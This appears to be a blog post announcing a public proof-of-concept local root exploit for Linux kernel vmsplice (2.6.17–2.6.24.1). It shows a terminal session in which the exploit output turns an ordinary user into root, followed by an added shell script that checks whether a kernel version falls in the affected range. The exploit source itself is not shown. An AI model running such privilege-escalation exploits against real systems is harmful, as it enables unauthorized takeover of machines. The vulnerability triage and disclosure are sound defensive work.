Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploit


A proof of concept for a local root exploit against Linux kernels between versions 2.6.17 and 2.6.24.1 has been released by ‘milw0rm’. I guess I won’t be the only one who says “feck…” to this.

$ gcc exploit.c -o exploit
$ whoami
heikki
$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root
Kernel 2.6.22-14-generic
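
A quick triage check for the version range named above, added here as an example; it is not part of the original post or of the exploit code. The function names are hypothetical, every sample release other than 2.6.22-14-generic is constructed, and the check looks at the version number only: a distribution kernel inside the range may already carry a backported fix.

```sh
#!/bin/sh
# Flag kernel releases inside the range this post names (2.6.17 .. 2.6.24.1).
# Version-only heuristic: it cannot see distribution backports.

# Turn a release string such as "2.6.22-14-generic" into one sortable integer.
kver_key() {
    base=${1%%[-+_]*}                       # drop suffix like "-14-generic"
    case $base in ''|*[!0-9.]*) return 1 ;; esac
    oldifs=$IFS; IFS=.
    set -- $base                            # split on dots into $1..$4
    IFS=$oldifs
    echo $(( ${1:-0} * 1000000000 + ${2:-0} * 1000000 + ${3:-0} * 1000 + ${4:-0} ))
}

# Prints in-range / out-of-range / unknown; exit status 0 / 1 / 2.
vmsplice_range_check() {
    key=$(kver_key "$1") || { echo unknown; return 2; }
    lo=$(kver_key 2.6.17)
    hi=$(kver_key 2.6.24.1)
    if [ "$key" -ge "$lo" ] && [ "$key" -le "$hi" ]; then
        echo in-range
        return 0
    fi
    echo out-of-range
    return 1
}

# The running kernel, the kernel from the session above, and constructed samples.
for rel in "$(uname -r)" 2.6.22-14-generic 2.6.24.2 2.6.16.60-0.21-default; do
    printf '%-28s %s\n' "$rel" "$(vmsplice_range_check "$rel")"
done
```

For hosts reported as in-range, confirm against the distribution's security tracker whether the installed package already includes the fix before treating the result as final.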

References:
LKML
milw0rm.com
Launchpad
Debian Bugs
